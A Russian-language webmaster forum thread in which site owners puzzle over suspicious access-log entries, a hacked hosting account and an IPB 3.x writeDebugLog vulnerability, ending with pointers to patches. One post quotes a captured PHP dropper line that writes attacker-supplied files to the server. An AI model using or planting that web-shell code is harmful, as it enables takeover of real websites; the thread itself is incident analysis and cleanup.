Подозрительный лог

ботики, а что такого то? если открыть access.log сервера с кучей сайтов, например шаред хостинга то там еще и не такое можно увидеть)))

По большей части меня смущает PHP конструкция встроенная в HEAD запрос (выделено красным)

ну проверяют возможность выполнения кода, это же очевидно

Не осилил.

И тут интерестно, наверно ищет жумлу с конкретным шаблоном.

Может в шаблоне дыра.

Много там еще странных запросом с данного ІР?

Сканнер наверно.

Т.е. это можно рассматривать как попытку взлома, я правильно понял?

да, сайт на JOOMLA

нет за последние 3 дня это все

Аккаунт на хостинге был взломан, замена всех паролей ничего не давала

Эта гадость смогла пролезть даже в корневую папку хостинга, на 2 уровня выше корневых папок сайтов

Сейчас восстановил сайты на др. хостинге, на разных аккаунтах и слежу за активностью

наверно два запроса связаны.

первый, наверно, должен создать 4d01a1812c320b0b54c9065577aa2276.php

Сделайте себе первый запрос и посмотрите - появится-ли файл.

Сделал запрос в браузере, файл не появился,

также надо учитывать что он находится на др хостинге

кстати, не похоже, что и в первом случае он появился.

последняя строка отдает 404

И не появится.

Т.к. нужен ( в Вашем случае ) HTTP заголовок ( A59DC2C8 ) от клиента который бы содержал base64 закодированный сценарий для атаки.

--

Меня эта **ень тоже поразила, сайт на IPB.

Сейчас пытаюсь повторить все что бот делал.

--

В общем, первые действия, это они как то инициируют создание файла типа:

==============================================================================

 URL: /index.php/index.php

 Date: Mon, 05 Nov 2012 20:28:56 +0000

 IP Address: 74.208.213.252

 Time Taken: 0.00023

 <?php print(md5(123456));echo file_put_contents($_POST[f],$_POST); ?>



==============================================================================

==============================================================================

=========================        END       ===================================

========================= /index.php? ===================================

==============================================================================

Дальше уже через него создают другой, более большой файл ( 92 КБ ) в котором текст читаем но на первый взгляд не понятен.

Выполняет какой то поиск(?).

---------- Добавлено 07.11.2012 в 23:14 ----------

Немного поискав, нашел конечный код который дает создать файл который я представил в теге code

Это функция writeDebugLog класса БД, которая вызывается с нестандартными параметрами.

IPB форумы 3.1, 3.2 и 3.3 версий подвержены уязвимости.

Как это работает и что где создается человек описал тут

Доп инфа тут

Заплатки тут для рус версий, а тут от разрабов для инглиш

Сам только что вычистил 2 инвижна 3.3.4 и 3.1.4 от этой гадости....